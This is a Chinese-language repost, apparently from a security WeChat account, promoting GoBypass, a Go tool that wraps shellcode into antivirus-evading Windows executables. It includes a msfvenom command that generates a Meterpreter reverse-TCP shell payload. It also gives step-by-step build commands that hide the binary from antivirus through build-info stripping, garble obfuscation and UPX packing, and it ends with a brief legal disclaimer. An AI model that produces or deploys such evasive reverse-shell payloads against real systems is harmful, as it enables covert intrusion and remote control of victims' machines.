GoBypass - Golang免杀生成工具
2022-10-10 10:4:44 Author: 黑白之道(查看原文) 阅读量:49 收藏

Golang免杀生成工具,参考网上已有的免杀方式实现的半自动免杀马生成工具,需要本地安装Golang环境,支持多种参数与方式生成。
项目地址:
https://github.com/4ra1n/GoBypass
0x01 免责声明
该工具仅用于安全研究,禁止使用工具发起非法攻击等违法行为,造成的后果使用者负责。
0x02 介绍
Golang免杀马生成工具(该工具仅针对Windows系统),不确定免杀效果如何,核心部分借鉴大佬的代码然后自己造轮子。
使用参考视频:
https://www.bilibili.com/video/BV1iu411d7QB
0x03 准备工作
在kali中使用msfvenom生成需要的payload(注意使用-f c参数),示例:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -f c
复制完整C语言格式的shellcode并写入当前目录的shellcode.txt(无需过多处理,内部会对ShellCode进行编码)
0x04 生成免杀马
在生成免杀马之前请注意以下三件事:
确保安装Golang且环境变量中包含go,否则无法编译请在当前目录先执行go env -w GO111MODULE=on,然后go mod download命令下载依赖如果下载依赖过慢,配置镜像go env -w GOPROXY=https://mirrors.aliyun.com/goproxy
一切就绪后就可以开始生成了,示例:
使用CreateThread模块并删除编译信息:go run main.go -m CreateThread -d
删除编译信息且用garble混淆源码后编译:go run main.go -m CreateThread -d -g
编译后的可执行文件进行upx加壳:go run main.go -m CreateThread -d -g -u
可选参数如下:
其中必须的模块参数如下:
0x05 参考
尤其感谢Safe6Sec师傅的项目
  • https://github.com/safe6Sec/GolangBypassAV
  • https://github.com/Ne0nd0g/go-shellcod

文章来源:系统安全运维

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650553543&idx=4&sn=8365e556adc0ef741e22c154c837ab60&chksm=83bd5923b4cad035f7a0632ec49e187c048c8dbf3ea910dd8e79d82200278cd900c2e36e44c2#rd
如有侵权请联系:admin#unsafe.sh